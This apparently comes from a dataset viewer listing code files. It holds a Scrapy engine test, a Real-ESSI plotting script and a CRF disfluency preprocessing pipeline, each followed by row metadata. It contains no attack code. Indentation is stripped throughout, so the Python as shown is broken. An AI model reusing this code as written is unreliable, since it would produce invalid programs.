def __init__(self, spider_class):
self.spider = None
self.respplug = []
self.reqplug = []
self.reqdropped = []
self.reqreached = []
self.itemerror = []
self.itemresp = []
self.signals_catched = {}
self.spider_class = spider_class
def run(self):
self.port = start_test_site()
self.portno = self.port.getHost().port
start_urls = [self.geturl("/"), self.geturl("/redirect"),
self.geturl("/redirect")] # a duplicate
for name, signal in vars(signals).items():
if not name.startswith('_'):
dispatcher.connect(self.record_signal, signal)
self.crawler = get_crawler(self.spider_class)
self.crawler.signals.connect(self.item_scraped, signals.item_scraped)
self.crawler.signals.connect(self.item_error, signals.item_error)
self.crawler.signals.connect(self.request_scheduled, signals.request_scheduled)
self.crawler.signals.connect(self.request_dropped, signals.request_dropped)
self.crawler.signals.connect(self.request_reached, signals.request_reached_downloader)
self.crawler.signals.connect(self.response_downloaded, signals.response_downloaded)
self.crawler.crawl(start_urls=start_urls)
self.spider = self.crawler.spider
self.deferred = defer.Deferred()
dispatcher.connect(self.stop, signals.engine_stopped)
return self.deferred
def stop(self):
self.port.stopListening()
for name, signal in vars(signals).items():
if not name.startswith('_'):
disconnect_all(signal)
self.deferred.callback(None)
def geturl(self, path):
return "http://localhost:%s%s" % (self.portno, path)
def getpath(self, url):
u = urlparse(url)
return u.path
def item_error(self, item, response, spider, failure):
self.itemerror.append((item, response, spider, failure))
def item_scraped(self, item, spider, response):
self.itemresp.append((item, response))
def request_scheduled(self, request, spider):
self.reqplug.append((request, spider))
def request_reached(self, request, spider):
self.reqreached.append((request, spider))
def request_dropped(self, request, spider):
self.reqdropped.append((request, spider))
def response_downloaded(self, response, spider):
self.respplug.append((response, spider))
def record_signal(self, *args, **kwargs):
"""Record a signal and its parameters"""
signalargs = kwargs.copy()
sig = signalargs.pop('signal')
signalargs.pop('sender', None)
self.signals_catched[sig] = signalargs
class EngineTest(unittest.TestCase):
@defer.inlineCallbacks
def test_crawler(self):
for spider in TestSpider, DictItemsSpider:
self.run = CrawlerRun(spider)
yield self.run.run()
self._assert_visited_urls()
self._assert_scheduled_requests(urls_to_visit=8)
self._assert_downloaded_responses()
self._assert_scraped_items()
self._assert_signals_catched()
self.run = CrawlerRun(TestDupeFilterSpider)
yield self.run.run()
self._assert_scheduled_requests(urls_to_visit=7)
self._assert_dropped_requests()
self.run = CrawlerRun(ItemZeroDivisionErrorSpider)
yield self.run.run()
self._assert_items_error()
def _assert_visited_urls(self):
must_be_visited = ["/", "/redirect", "/redirected",
"/item1.html", "/item2.html", "/item999.html"]
urls_visited = set([rp[0].url for rp in self.run.respplug])
urls_expected = set([self.run.geturl(p) for p in must_be_visited])
assert urls_expected <= urls_visited, "URLs not visited: %s" % list(urls_expected - urls_visited)
def _assert_scheduled_requests(self, urls_to_visit=None):
self.assertEqual(urls_to_visit, len(self.run.reqplug))
paths_expected = ['/item999.html', '/item2.html', '/item1.html']
urls_requested = set([rq[0].url for rq in self.run.reqplug])
urls_expected = set([self.run.geturl(p) for p in paths_expected])
assert urls_expected <= urls_requested
scheduled_requests_count = len(self.run.reqplug)
dropped_requests_count = len(self.run.reqdropped)
responses_count = len(self.run.respplug)
self.assertEqual(scheduled_requests_count,
dropped_requests_count + responses_count)
self.assertEqual(len(self.run.reqreached),
responses_count)
def _assert_dropped_requests(self):
self.assertEqual(len(self.run.reqdropped), 1)
def _assert_downloaded_responses(self):
# response tests
self.assertEqual(8, len(self.run.respplug))
self.assertEqual(8, len(self.run.reqreached))
for response, _ in self.run.respplug:
if self.run.getpath(response.url) == '/item999.html':
self.assertEqual(404, response.status)
if self.run.getpath(response.url) == '/redirect':
self.assertEqual(302, response.status)
def _assert_items_error(self):
self.assertEqual(2, len(self.run.itemerror))
for item, response, spider, failure in self.run.itemerror:
self.assertEqual(failure.value.__class__, ZeroDivisionError)
self.assertEqual(spider, self.run.spider)
self.assertEqual(item['url'], response.url)
if 'item1.html' in item['url']:
self.assertEqual('Item 1 name', item['name'])
self.assertEqual('100', item['price'])
if 'item2.html' in item['url']:
self.assertEqual('Item 2 name', item['name'])
self.assertEqual('200', item['price'])
def _assert_scraped_items(self):
self.assertEqual(2, len(self.run.itemresp))
for item, response in self.run.itemresp:
self.assertEqual(item['url'], response.url)
if 'item1.html' in item['url']:
self.assertEqual('Item 1 name', item['name'])
self.assertEqual('100', item['price'])
if 'item2.html' in item['url']:
self.assertEqual('Item 2 name', item['name'])
self.assertEqual('200', item['price'])
def _assert_signals_catched(self):
assert signals.engine_started in self.run.signals_catched
assert signals.engine_stopped in self.run.signals_catched
assert signals.spider_opened in self.run.signals_catched
assert signals.spider_idle in self.run.signals_catched
assert signals.spider_closed in self.run.signals_catched
self.assertEqual({'spider': self.run.spider},
self.run.signals_catched[signals.spider_opened])
self.assertEqual({'spider': self.run.spider},
self.run.signals_catched[signals.spider_idle])
self.run.signals_catched[signals.spider_closed].pop('spider_stats', None) # XXX: remove for scrapy 0.17
self.assertEqual({'spider': self.run.spider, 'reason': 'finished'},
self.run.signals_catched[signals.spider_closed])
@defer.inlineCallbacks
def test_close_downloader(self):
e = ExecutionEngine(get_crawler(TestSpider), lambda _: None)
yield e.close()
@defer.inlineCallbacks
def test_close_spiders_downloader(self):
e = ExecutionEngine(get_crawler(TestSpider), lambda _: None)
yield e.open_spider(TestSpider(), [])
self.assertEqual(len(e.open_spiders), 1)
yield e.close()
self.assertEqual(len(e.open_spiders), 0)
@defer.inlineCallbacks
def test_close_engine_spiders_downloader(self):
e = ExecutionEngine(get_crawler(TestSpider), lambda _: None)
yield e.open_spider(TestSpider(), [])
e.start()
self.assertTrue(e.running)
yield e.close()
self.assertFalse(e.running)
self.assertEqual(len(e.open_spiders), 0)
if __name__ == "__main__":
if len(sys.argv) > 1 and sys.argv[1] == 'runserver':
start_test_site(debug=True)
reactor.run()
| bsd-3-clause | 556,884,160,656,988,860 | 35.588816 | 111 | 0.632383 | false |
BorisJeremic/Real-ESSI-Examples | analytic_solution/test_cases/Contact/Static_Normal_Contact/Normal_Behviour/SoftContact_NonLinHardSoftShear/plot.py | 1 | 1585 | #!/usr/bin/python
import h5py
import matplotlib.pylab as plt
import sys
import numpy as np;
################ Node # 2 Displacement #############################
#######################################
## Analytical Solution
#######################################
finput = h5py.File('Analytical_Solution.feioutput')
plt.figure()
# Read the time and displacement
times = finput["time"][:]
normal_strain = finput["/Model/Elements/Element_Outputs"][6,:]
normal_stress = -finput["/Model/Elements/Element_Outputs"][9,:];
# plt.plot(normal_strain,normal_stress,'-r',Linewidth=4,label='Analytical Solution')
plt.hold(True)
#######################################
## Current Solution
#######################################
# Go over each feioutput and plot each one.
thefile = "Monotonic_Contact_Behaviour_Adding_Normal_Load.h5.feioutput";
finput = h5py.File(thefile)
# Read the time and displacement
times = finput["time"][:]
normal_strain = finput["/Model/Elements/Element_Outputs"][6,:]
normal_stress = -finput["/Model/Elements/Element_Outputs"][9,:];
# Configure the figure filename, according to the input filename.
outfig=thefile.replace("_","-")
outfigname=outfig.replace("h5.feioutput","pdf")
# Plot the figure. Add labels and titles.
plt.plot(normal_strain,normal_stress,'-k',Linewidth=4,label='Numerical Solution')
plt.xlabel(r"Normal Strain $\epsilon$")
plt.ylabel(r"Normal Stress $\sigma$")
plt.legend()
plt.savefig("Contact_Normal_Interface_Behavour.pdf", bbox_inches='tight')
# plt.show()
# #####################################################################
| cc0-1.0 | 8,658,133,854,043,327,000 | 29.480769 | 84 | 0.60694 | false |
linkinwong/word2vec | src/crf-paper-script/preprocessor9_complete_ngram.py | 1 | 8544 | # coding: utf-8
__author__ = 'linlin'
import os
import logging
import re
import pdb
import string
logger = logging.getLogger(__name__)
################################################################
root_dir = '/home/linlin/time/0903_classify_false_start/1003_raw_features/'
separator = '\t\t'
################################################################
def MakeNewFolderVersionHigher(data_directory, dir_name):
## 在选定的文件夹里生成更高版本号的文件夹 data_directory - can be relative directory
## dir_name - the new folder name you want to creat
abs_data_directory = os.path.abspath(os.path.dirname(data_directory))
version_number = 1
dirs = os.listdir(abs_data_directory)
for dir in dirs:
if dir_name in dir:
version_str = re.findall(r'Dir_\d+',dir)
number_str =''.join((version_str[-1])[4:])
if True == number_str.isdigit():
number= int (number_str)
if number>version_number:
version_number = number
new_folder_name = dir_name + "_%d" %(version_number+1)
folderFullPath = os.path.join(abs_data_directory,new_folder_name )
os.makedirs(folderFullPath)
return folderFullPath
#########################################################
output_root_dir = MakeNewFolderVersionHigher(root_dir, 'processDir' )
data_dir = root_dir + 'data4'
code_dir = root_dir + 'src/'
##############################################################
def DirProcessing(source_path, dest_path):
path = source_path
for root, dirs, files in os.walk(path):
for filespath in files:
abs_file_path = os.path.join(root, filespath)
logger.debug("Visited one file!")
Standardize(abs_file_path, dest_path, ' ')
def DirProcessingForSSR(source_path, dest_path):
path = source_path
for root, dirs, files in os.walk(path):
for filespath in files:
abs_file_path = os.path.join(root, filespath)
logger.debug("Visited one file!")
GetSsrFeature(abs_file_path, dest_path, '\t')
def GetAttributes(source_path, dest_path):
################################################################
script_file = code_dir + 'chunker9_complete_2gram.py'
################################################################
path = source_path
for root, dirs, files in os.walk(path):
for filespath in files:
abs_file_path = os.path.join(root, filespath)
logger.debug("Visited one file!")
crf_path = dest_path + '/' + os.path.basename(abs_file_path) + '.crfsuite'
os.system('cat ' + abs_file_path +' | python ' + script_file + " > " + crf_path )
def RunClassifier(source_path, dest_path):
path = source_path
for root, dirs, files in os.walk(path):
for filespath in files:
if 'tr.txt' in filespath:
train_path = os.path.join(root, filespath)
elif 'te.txt' in filespath:
test_path = os.path.join(root, filespath)
#pdb.set_trace()
result_path = dest_path + '/' + 'result.txt'
os.system('crfsuite learn -e2 ' + train_path + " " + test_path + " > " + result_path )
def FindNeighborTokenSubscript(first_token_list, current_pos , up_or_down ):
pos = current_pos
ind = up_or_down
li = first_token_list
if ind == 1:
i = 1
while len(li[pos+i]) < 1:
i += 1
return pos+i
if ind == -1:
i = 1
while len(li[pos-i]) < 1:
i += 1
return pos-i
def Standardize(path, dest_dir, sep):
output_path = dest_dir+ '/' + os.path.basename(path) + '.standard'
output_file_obj = open(output_path,'w')
file_obj = open(path)
line_list = file_obj.readlines()
token_list = []
for j in range(len(line_list)):
word_list = line_list[j].split()
if len(word_list) < 2:
token_list.append('')
else:
token_list.append(word_list[0])
repetition_vec_list = []
for i in range(len(line_list)):
if len(token_list[i]) == 0:
repetition_vec_list.append('')
else:
if i < 4 or i > len(line_list)- 5:
repetition_vec_list.append(['diff', 'diff','diff', 'diff'])
else:
previous_subscript = FindNeighborTokenSubscript(token_list, i, -1)
prev_prev_subscript = FindNeighborTokenSubscript(token_list, previous_subscript, -1)
next_subscript = FindNeighborTokenSubscript(token_list, i, 1)
next_next_subscript = FindNeighborTokenSubscript(token_list, next_subscript, 1)
prev_prev_label = 'same' if (token_list[i] == token_list[prev_prev_subscript]) else "diff"
prev_label = 'same' if (token_list[i] == token_list[previous_subscript]) else "diff"
next_label = 'same' if (token_list[i] == token_list[next_subscript]) else "diff"
next_next_subscript = 'same' if (token_list[i] == token_list[next_next_subscript]) else "diff"
repetition_vec_list.append([prev_prev_label, prev_label, next_label, next_next_subscript])
for k in range(len(line_list)):
line = line_list[k]
if len(line)<13:
label = ''
else:
word_list = line.split()
if 'filler' in word_list[4]:
label = 'filler'
elif 'repeat' in word_list[4] or 'nsert' in word_list[4]:
label = 'repeat'
elif 'restart' in word_list[4] or 'extraneou' in word_list[4]:
label = 'false_start'
elif 'elete' in word_list[4]:
label = 'other'
else:
label = 'OK'
if '-' in word_list[0]:
patial = 'patial'
else:
patial = 'nonpatial'
label = label
token = word_list[0]
pos = word_list[1]
word = word_list[2]
sem = word_list[3]
patial = patial
#pdb.set_trace()
pp = repetition_vec_list[k][0]
p = repetition_vec_list[k][1]
n = repetition_vec_list[k][2]
nn = repetition_vec_list[k][3]
ng2 = 'ng2:'+ str( -1 * string.atof(word_list[5]))
#ng2 = 'ng2:'+ word_list[5]
# ng3 = 'ng3:'+ word_list[11]
# ng4 = 'ng4:'+ word_list[12]
# ng3pr = 'ng3pr:'+ word_list[13]
#pdb.set_trace()
if len(line)<13:
line_format = ''
else:
line_format = (
"%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
%(label, sep, token,sep,pos, sep,word,sep,sem, sep, patial, sep,
pp, sep, p, sep, n,sep, nn, sep, ng2))
output_file_obj.write(line_format)
output_file_obj.write('\n')
output_file_obj.close()
file_obj.close()
def GetSsrFeature(path, dest_dir, sep):
output_path = dest_dir+ '/' + os.path.basename(path) + '.noSpace'
output_file_obj = open(output_path,'w')
file_obj = open(path)
for line in file_obj:
if len(line)<3:
newLine = ''
else:
word_list = line[54:].split()
newLine = '_'.join(word_list)
token = line[:15].strip()
pos = line[15:25].strip()
word = line[25:40].strip()
sem = line[40:54].strip()
label = newLine
if len(line)<3:
line_format = ''
else:
line_format = "%s%s%s%s%s%s%s%s%s%s" %(token,sep,pos,sep,word,sep,sem, sep, label, sep)
output_file_obj.write(line_format)
output_file_obj.write('\n')
output_file_obj.close()
file_obj.close()
if __name__ == '__main__':
logFile = output_root_dir + "/logFile.txt"
logging.basicConfig(filename=logFile, level = logging.DEBUG)
os.makedirs(output_root_dir + "/standardStep1")
dest_dir = output_root_dir + "/standardStep1"
DirProcessing(data_dir, dest_dir)
# os.makedirs(output_root_dir + "/standardStep2") #
# dest_dir = output_root_dir + "/standardStep2"
# DirProcessing(data_dir, dest_dir) #
os.makedirs(output_root_dir + "/attributesStep3")
attr_dir = output_root_dir + "/attributesStep3"
GetAttributes(dest_dir, attr_dir)
os.makedirs(output_root_dir + "/classificationStep4")
result_dir = output_root_dir + "/classificationStep4"
RunClassifier( attr_dir, result_dir)
| apache-2.0 | -2,062,712,346,878,222,600 | 32.620553 | 110 | 0.533388 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.